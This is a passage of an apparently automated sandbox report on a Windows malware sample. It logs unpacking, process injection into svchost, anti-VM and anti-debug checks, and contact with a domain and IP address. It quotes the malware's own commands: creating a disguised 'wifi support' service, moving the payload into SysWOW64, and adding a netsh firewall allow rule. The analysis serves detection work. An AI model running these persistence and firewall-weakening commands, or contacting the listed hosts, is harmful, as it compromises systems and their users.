            Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
            Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
            Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
            Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
            Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | File created: C:\Users\user\AppData\Local\Temp\pjzcupje.exe
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6956:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01
            Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: OcmKX57vR7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\cowuyal\goseyacav56 vekahapej 67\gidexazanevo.pdb source: OcmKX57vR7.exe, pjzcupje.exe.0.dr
            Source: Binary string: [C:\cowuyal\goseyacav56 vekahapej 67\gidexazanevo.pdb source: OcmKX57vR7.exe, pjzcupje.exe.0.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeUnpacked PE file: 0.2.OcmKX57vR7.exe.400000.0.unpack
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeUnpacked PE file: 13.2.pjzcupje.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeUnpacked PE file: 0.2.OcmKX57vR7.exe.400000.0.unpack .text:ER;.data:W;.xovuhih:W;.nos:W;.xij:W;.devo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeUnpacked PE file: 13.2.pjzcupje.exe.400000.0.unpack .text:ER;.data:W;.xovuhih:W;.nos:W;.xij:W;.devo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_0042FFE8 push edx; ret 0_2_0042FFE9
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_0042FFE8 push edx; ret 13_2_0042FFE9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02522F0F push eax; iretd 17_2_02522F10
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069
            Source: OcmKX57vR7.exeStatic PE information: section name: .xovuhih
            Source: OcmKX57vR7.exeStatic PE information: section name: .nos
            Source: OcmKX57vR7.exeStatic PE information: section name: .xij
            Source: OcmKX57vR7.exeStatic PE information: section name: .devo

Persistence and Installation Behavior

Source: unknown | Executable created and started: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe (copy)
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | File created: C:\Users\user\AppData\Local\Temp\pjzcupje.exe
Source: C:\Windows\SysWOW64\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ghrubsm
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\svchost.exe | File deleted: c:\users\user\desktop\ocmkx57vr7.exe
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00401000
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\svchost.exe | System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_13-20256
Source: C:\Windows\SysWOW64\svchost.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_17-7587
Source: C:\Windows\SysWOW64\svchost.exe TID: 6964 | Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 6964 | Thread sleep time: -100000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6196 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1664 | Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1820 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_17-7336
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_13-20212
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_17-6184
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-28028
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_13-19858
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | API coverage: 5.8 %
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | API coverage: 6.8 %
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Evaded block: after key decision graph_0-27998
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Evaded block: after key decision graph_13-19828
Source: C:\Windows\SysWOW64\svchost.exe | Evaded block: after key decision graph_17-6269
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,17_2_0251199C
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | API call chain: ExitProcess graph end node graph_13-20216
Source: C:\Windows\SysWOW64\svchost.exe | API call chain: ExitProcess graph end node graph_17-6185
Source: svchost.exe, 0000001A.00000002.528966666.0000023757A64000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000022.00000002.528970263.00000290CD854000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000022.00000002.528970263.00000290CD854000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware7,1
Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 00000012.00000002.527907526.000001D489802000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 0000001A.00000002.528952167.0000023757A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.528290622.0000023752429000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.438828550.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.438088492.000001D6C5081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.401236022.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528394040.00000290CC8C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528209046.00000290CC852000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM
Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
Source: svchost.exe, 00000022.00000002.528689442.00000290CD113000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
Source: svchost.exe, 00000012.00000002.528059713.000001D489840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.528201116.000001EC65A2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,0_2_00401D96

Anti Debugging

Source: C:\Windows\SysWOW64\svchost.exe | Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep graph_17-7643
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00AD092B mov eax, dword ptr fs:[00000030h] 0_2_00AD092B
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00AD0D90 mov eax, dword ptr fs:[00000030h] 0_2_00AD0D90
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_0040EBCC GetProcessHeap,RtlAllocateHeap,0_2_0040EBCC
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Code function: 13_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,13_2_00409A6B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_02519A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,17_2_02519A6B

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.207.0 25
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: svartalfheim.top
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 46.173.215.82 443
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 2510000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2510000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2510000
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 26D1008
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conection
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ghrubsm
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00406EDD
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_0040EC54 GetSystemTimeAsFileTime,GetVolumeInformationA,GetTickCount,0_2_0040EC54
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,0_2_0040B211
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,0_2_0040405E
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,0_2_00409326

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 00000017.00000002.528133562.000001E068E3D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000022.00000002.528905739.00000290CD1F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 00000017.00000002.528226772.000001E068F02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000022.00000002.528905739.00000290CD1F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .@C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: OcmKX57vR7.exe PID: 6360, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pjzcupje.exe PID: 6792, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6936, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPE
